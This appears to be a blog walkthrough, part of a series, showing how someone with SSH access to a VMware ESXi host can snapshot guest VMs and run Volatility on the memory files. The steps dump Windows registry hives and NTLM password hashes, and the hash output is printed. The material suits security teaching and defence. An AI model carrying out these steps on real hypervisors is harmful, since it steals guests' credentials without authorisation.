Memdumps, Volatility, Mimikatz, VMs – Part 8: ESXi Attacking Scenario – Volatility on ESXi

How cool is that: the Volatility standalone build runs directly on ESXi…
This scenario only applies if you have SSH access to the ESXi server.
Connecting to downloads.volatilityfoundation.org (173.61.222.9:80)
volatility_2.5.linux 100% |*******************************| 32039k  0:00:00 ETA
[root@localhost:/tmp] unzip volatility_2.5.linux.standalone.zip
Archive:  volatility_2.5.linux.standalone.zip
   creating: volatility_2.5.linux.standalone/
  inflating: volatility_2.5.linux.standalone/AUTHORS.txt
  inflating: volatility_2.5.linux.standalone/CREDITS.txt
  inflating: volatility_2.5.linux.standalone/LEGAL.txt
  inflating: volatility_2.5.linux.standalone/LICENSE.txt
  inflating: volatility_2.5.linux.standalone/README.txt
  inflating: volatility_2.5.linux.standalone/volatility_2.5_linux_x64
  inflating: volatility_2.5.linux.standalone/volatility_2.5_linux_x86
Find the .vmem files:
[root@localhost:~] find -name *.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/winxpsp3/winxpsp3-Snapshot3.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/winxpsp3/winxpsp3-Snapshot2.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot1.vmem
On to the usual stuff:
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 -f "./Windows 7 x64-Snapshot1.vmem" imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot1.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800029fd0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800029fed00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-30 08:36:01 UTC+0000
     Image local date and time : 2016-01-30 09:36:01 +0100
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 -f "./Windows 7 x64-Snapshot1.vmem" --profile=Win7SP1x64 hivelist
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a000f21010 0x000000000e407010 \SystemRoot\System32\Config\SAM
0xfffff8a000f241f0 0x000000001503b1f0 \SystemRoot\System32\Config\SECURITY
0xfffff8a000fcf010 0x0000000013dd3010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a0010211b0 0x0000000013c0c1b0 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a00193f010 0x0000000007284010 \??\C:\Users\dax\ntuser.dat
0xfffff8a001994010 0x000000002a835010 \??\C:\Users\dax\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a003226010 0x0000000015fe6010 \SystemRoot\System32\Config\DEFAULT
0xfffff8a00000f010 0x0000000027147010 [no name]
0xfffff8a000024010 0x00000000270d2010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000053010 0x0000000027001010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000c38010 0x0000000001afb010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000d3f010 0x0000000022d0e010 \SystemRoot\System32\Config\SOFTWARE
[root@localhost:/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64] /tmp/volatility_2.5.linux.standalone/volatility_2.5_linux_x64 hashdump -f "./Windows 7 x64-Snapshot1.vmem" --profile=Win7SP1x64 -y 0xfffff8a000024010 -s 0xfffff8a000f21010
Volatility Foundation Volatility Framework 2.5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1000:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Create a snapshot
Yes, of course it is possible to create a snapshot on the CLI; the trailing 1 0 are the includeMemory and quiesced arguments, and including memory is what produces the .vmem file.
[root@localhost:~] vim-cmd vmsvc/snapshot.create 5 "snap" "some comment" 1 0
And again:
[root@localhost:~] find -name *.vmem
./vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem
[root@localhost:/tmp/volatility_2.5.linux.standalone] ./volatility_2.5_linux_x64 -f "/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem" imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/vmfs/volumes/56ac1339-5203be7f-4c07-000c29b25698/Windows 7 x64/Windows 7 x64-Snapshot5.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002a4b0a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002a4cd00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-31 14:55:50 UTC+0000
     Image local date and time : 2016-01-31 15:55:50 +0100
and so on.
Links: